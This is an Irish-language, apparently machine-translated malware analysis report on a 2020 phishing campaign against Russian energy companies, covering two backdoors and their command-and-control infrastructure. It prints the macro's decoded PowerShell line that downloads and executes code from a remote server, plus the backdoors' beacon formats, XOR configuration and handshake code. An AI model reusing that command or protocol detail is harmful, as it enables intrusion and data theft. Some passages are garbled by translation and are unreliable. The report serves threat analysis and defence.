Léiríonn an taithí atá againn maidir le himscrúdú a dhéanamh ar theagmhais slándála ríomhaire go bhfuil ríomhphost fós ar cheann de na bealaí is coitianta a úsáideann ionsaitheoirí chun dul isteach i mbonneagar líonra faoi ionsaí ar dtús. Éiríonn gníomh míchúramach amháin le litir amhrasach (nó litir nach bhfuil chomh amhrasach) mar phointe iontrála le haghaidh tuilleadh ionfhabhtaithe, agus is é sin an fáth go bhfuil cibearchoireachta ag baint úsáide as modhanna innealtóireachta sóisialta go gníomhach, cé go n-éireoidh le leibhéil éagsúla.
Sa phost seo ba mhaith linn labhairt faoinár n-imscrúdú le déanaí ar fheachtas spam a dhírigh ar roinnt fiontar i gcoimpléasc breosla agus fuinnimh na Rúise. Lean gach ionsaí an cás céanna ag baint úsáide as ríomhphoist bhréige, agus ba chosúil nach ndearna aon duine mórán iarracht ar ábhar téacs na ríomhphoist seo.
Seirbhís faisnéise
Thosaigh sé ar fad ag deireadh mhí Aibreáin 2020, nuair a bhraith anailísithe víris Doctor Web feachtas turscair inar sheol hackers eolaire teileafóin nuashonraithe chuig fostaithe de chuid roinnt fiontar i gcoimpléasc breosla agus fuinnimh na Rúise. Ar ndóigh, ní raibh sé seo ina léiriú simplí imní, ós rud é nach raibh an t-eolaire fíor, agus na doiciméid .docx íoslódáil dhá íomhánna ó acmhainní iargúlta.
Íoslódáladh ceann acu go ríomhaire an úsáideora ón bhfreastalaí nuachta[.]zannews[.]com. Is fiú a lua go bhfuil an t-ainm fearainn cosúil leis an bhfearann atá ag lárionad meáin frith-éillithe na Casacstáine - zannews[.]kz. Ar an láimh eile, bhí an fearann a úsáideadh i gcuimhne láithreach ar fheachtas 2015 eile ar a dtugtar TOPNEWS, a bhain úsáid as backdoor ICEFOG agus a raibh fearainn rialaithe Trojan acu leis an bhfotheaghrán “nuacht” ina n-ainmneacha. Gné shuimiúil eile ab ea nuair a bhí ríomhphoist á seoladh chuig faighteoirí éagsúla, d’úsáid iarratais chun íomhá a íoslódáil paraiméadair iarratais dhifriúla nó ainmneacha íomhánna uathúla.
Creidimid go ndearnadh é seo ar mhaithe le faisnéis a bhailiú chun seolaí “iontaofa” a aithint, a mbeadh ráthaíocht aige ansin go n-osclófaí an litir ag an am ceart. Baineadh úsáid as prótacal SMB chun an íomhá a íoslódáil ón dara freastalaí, rud a d'fhéadfaí a dhéanamh chun hashes NetNTLM a bhailiú ó ríomhairí na bhfostaithe a d'oscail an doiciméad faighte.
Agus seo an litir féin leis an eolaire bréige:
I Meitheamh na bliana seo, thosaigh hackers ag baint úsáide as ainm fearainn nua, sports[.]manhajnews[.]com, chun íomhánna a uaslódáil. Léiríodh san anailís gur úsáideadh fofhearainn manhajnews[.]com i seoltaí turscair ó Mheán Fómhair 2019 ar a laghad. Ar cheann de spriocanna an fheachtais seo bhí ollscoil mhór na Rúise.
Chomh maith leis sin, faoi mhí an Mheithimh, tháinig lucht eagraithe an ionsaithe suas le téacs nua dá litreacha: an uair seo bhí faisnéis sa doiciméad faoi fhorbairt an tionscail. Thug téacs na litreach le fios go soiléir nach cainteoir dúchais Rúisise a bhí in údar na litreach, nó go raibh sé ag cruthú a leithéid d’aon ghnó faoi féin. Ar an drochuair, ní raibh sna smaointe maidir le forbairt an tionscail, mar a bhí i gcónaí, ach clúdach - íoslódáladh an doiciméad dhá íomhá arís, agus athraíodh an freastalaí chun[.]inklingpaper[.]com a íoslódáil.
Lean an chéad nuálaíocht eile i mí Iúil. In iarracht seachbhóthar a dhéanamh ar bhrath doiciméad mailíseach ag cláir antivirus, thosaigh ionsaitheoirí ag baint úsáide as doiciméid Microsoft Word criptithe le pasfhocal. Ag an am céanna, chinn na hionsaitheoirí teicníc innealtóireachta sóisialta clasaiceach a úsáid - fógra luach saothair.
Scríobhadh téacs an achomhairc arís sa stíl chéanna, rud a chothaigh amhras breise i measc an tseolaí. Níor athraigh an freastalaí chun an íomhá a íoslódáil ach oiread.
Tabhair faoi deara, i ngach cás, gur úsáideadh boscaí ríomhphoist leictreonacha atá cláraithe ar na fearainn mail[.]ru agus yandex[.]ru chun litreacha a sheoladh.
Ionsaí
Faoi thús Mheán Fómhair 2020, bhí an t-am tagtha le haghaidh gnímh. Thaifead ár n-anailísithe víreas tonn nua ionsaithe, inar sheol ionsaitheoirí litreacha arís agus iad ag iarraidh eolaire teileafóin a nuashonrú. An uair seo, áfach, bhí macra mailíseach sa cheangaltán.
Agus an doiciméad ceangailte á oscailt, chruthaigh an macra dhá chomhad:
- Script VBS %APPDATA% microsoftwindowsstart menuprogramsstartupadoba.vbs, a bhí beartaithe chun baiscchomhad a sheoladh;
- An baiscechomhad é féin %APPDATA%configstest.bat, rud a cuireadh i léig.
Is é croílár a cuid oibre ná an bhlaosc Powershell a sheoladh le paraiméadair áirithe. Déantar na paraiméadair a chuirtear ar aghaidh chuig an bhlaosc a dhíchódú in orduithe:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Mar a leanas ó na horduithe a chuirtear i láthair, tá an fearann óna íoslódáltar an pálasta faoi cheilt arís mar shuíomh nuachta. A simplí , arb é an t-aon tasc atá aige blaoscchód a fháil ón bhfreastalaí ordaithe agus rialaithe agus é a fhorghníomhú. Bhíomar in ann dhá chineál cúldorais a aithint is féidir a shuiteáil ar ríomhaire an íospartaigh.
BackDoor.Siggen2.3238
Is é an chéad cheann BackDoor.Siggen2.3238 - níor tháinig ár speisialtóirí i dteagmháil roimhe seo, agus níor luaigh díoltóirí antivirus eile an clár seo ar bith.
Cúldhoras é an clár seo scríofa i C++ agus a ritheann ar chórais oibriúcháin Windows 32-giotán.
BackDoor.Siggen2.3238 in ann cumarsáid a dhéanamh leis an bhfreastalaí bainistíochta ag baint úsáide as dhá phrótacal: HTTP agus HTTPS. Úsáideann an sampla tástáladh prótacal HTTPS. Úsáidtear an Gníomhaire Úsáideora seo a leanas in iarratais chuig an bhfreastalaí:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Sa chás seo, soláthraítear na paraiméadair seo a leanas do gach iarratas:
%s;type=%s;length=%s;realdata=%send
ina gcuirtear na nithe seo a leanas in ionad gach líne %s dá réir.
- ID an ríomhaire ionfhabhtaithe,
- cineál iarratais atá á sheoladh,
- fad na sonraí sa réimse fíorshonraí,
- sonraí.
Ag an gcéim ina ndéantar faisnéis a bhailiú faoin gcóras ionfhabhtaithe, gineann an backdoor líne mar:
lan=%s;cmpname=%s;username=%s;version=%s;
nuair is é lan seoladh IP an ríomhaire ionfhabhtaithe, is é cmpname an t-ainm ríomhaire, is é an t-ainm úsáideora an t-ainm úsáideora, is é an leagan líne 0.0.4.03.
Seoltar an fhaisnéis seo leis an aitheantóir sysinfo trí iarratas POST chuig an bhfreastalaí rialaithe atá suite ag https[:]//31.214[.]157.14/log.txt. Más mar fhreagra BackDoor.Siggen2.3238 a fhaigheann an comhartha HEART, meastar go n-éiríonn leis an nasc, agus tosaíonn an backdoor an príomh-thimthriall cumarsáide leis an bhfreastalaí.
Cur síos níos iomláine ar phrionsabail oibriúcháin BackDoor.Siggen2.3238 atá inár .
BackDoor.Whitebird.23
Is modhnú é an dara clár ar an backdoor BackDoor.Whitebird, atá ar eolas againn cheana féin ón eachtra le gníomhaireacht rialtais sa Chasacstáin. Tá an leagan seo scríofa i C++ agus tá sé deartha le rith ar chórais oibriúcháin 32-giotán agus 64-giotán Windows araon.
Cosúil le formhór na gclár den chineál seo, BackDoor.Whitebird.23 deartha chun nasc criptithe a bhunú leis an bhfreastalaí rialaithe agus rialú neamhúdaraithe ar ríomhaire ionfhabhtaithe. Suiteáilte i gcóras comhréiteach ag baint úsáide as dropper .
Leabharlann mhailíseach a bhí sa sampla a scrúdaíomar le dhá onnmhairiú:
- Google Súgartha
- Scrúdú.
Ag tús a chuid oibre, díchriptíonn sé an chumraíocht atá sreangaithe go crua isteach sa chorp backdoor ag baint úsáide as algartam bunaithe ar oibríocht XOR le beart 0x99. Breathnaíonn an chumraíocht mar:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Chun a oibriú leanúnach a chinntiú, athraíonn an backdoor an luach a shonraítear sa réimse Uaireanta oibre cumraíochtaí. Tá 1440 beart sa réimse, a thógann na luachanna 0 nó 1 agus a léiríonn gach nóiméad de gach uair sa lá. Cruthaíonn sé snáithe ar leith do gach comhéadan líonra a éisteann leis an gcomhéadan agus a lorgaíonn paicéid údaraithe ar an seachfhreastalaí ón ríomhaire ionfhabhtaithe. Nuair a aimsítear paicéad den sórt sin, cuireann an backdoor faisnéis faoin seachfhreastalaí lena liosta. Ina theannta sin, seiceálann an láithreacht seachfhreastalaí trí WinAPI InternetQueryOptionW.
Seiceálann an clár an nóiméad agus an uair reatha agus cuireann sé i gcomparáid é leis na sonraí sa réimse Uaireanta oibre cumraíochtaí. Mura bhfuil an luach le haghaidh nóiméad comhfhreagrach an lae náid, bunaítear nasc leis an bhfreastalaí rialaithe.
Nuair a bhunaítear nasc leis an bhfreastalaí, samhlaítear cruthú nasc trí úsáid a bhaint as prótacal leagan TLS 1.0 idir an cliant agus an freastalaí. Tá dhá mhaolán i gcorp an chúldhoras.
Tá an paicéad TLS 1.0 Client Hello sa chéad mhaolán.
Sa dara maolán tá paicéid TLS 1.0 Malartú Eochracha Cliant le fad eochair de 0x100 bytes, Athraigh Cipher Spec, Teachtaireacht Criptithe Croitheadh Láimhe.
Agus paicéad Cliant Hello á sheoladh, scríobhann an backdoor 4 beart den am reatha agus 28 beart de shonraí randamacha bréagacha sa réimse Randamach Cliant, arna ríomh mar seo a leanas:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Seoltar an paicéad faighte chuig an bhfreastalaí rialaithe. Seiceálann an freagra (paicéad Freastalaí Dia duit):
- comhlíonadh phrótacal TLS leagan 1.0;
- comhfhreagras an stampa ama (na chéad 4 beart den réimse paicéad Sonraí Randamach) atá sonraithe ag an gcliant go dtí an stampa ama a shonraigh an freastalaí;
- meaitseáil na chéad 4 beart tar éis an stampa ama i réimse Sonraí Randamach an chliaint agus an fhreastalaí.
I gcás na meaitse sonraithe, ullmhaíonn an backdoor paicéad Malartú Eochracha Cliant. Chun seo a dhéanamh, modhnaíonn sé an Eochair Phoiblí sa phacáiste Malartú Eochracha Cliant, chomh maith leis an Criptithe IV agus Sonraí Criptithe sa phacáiste Teachtaireacht Criptithe Croitheadh Láimhe.
Faigheann an backdoor an paicéad ansin ón bhfreastalaí ordaithe agus rialaithe, seiceann sé gurb é an leagan prótacail TLS ná 1.0, agus ansin glacann sé 54 bytes eile (corp an phaicéid). Críochnaíonn sé seo an socrú ceangail.
Cur síos níos iomláine ar phrionsabail oibriúcháin BackDoor.Whitebird.23 atá inár .
Conclúid agus conclúidí
Ligeann anailís ar dhoiciméid, malware, agus an bonneagar a úsáidtear dúinn a rá le muinín gur ullmhaigh ceann de na grúpaí APT Síneach an t-ionsaí. Ag cur san áireamh feidhmiúlacht na backdoors atá suiteáilte ar ríomhairí na n-íospartach i gcás ionsaí rathúil, ionfhabhtú mar thoradh, ar a laghad, goid faisnéise rúnda ó ríomhairí na n-eagraíochtaí ionsaí.
Ina theannta sin, is cás an-dóchúil é Trojans speisialaithe a shuiteáil ar fhreastalaithe áitiúla a bhfuil feidhm speisialta acu. D'fhéadfadh siad seo a bheith ina rialtóirí fearainn, freastalaithe ríomhphoist, geataí Idirlín, srl. Mar a d'fheicfimid sa sampla , is díol spéise ar leith iad freastalaithe den sórt sin d'ionsaitheoirí ar chúiseanna éagsúla.
Foinse: will.com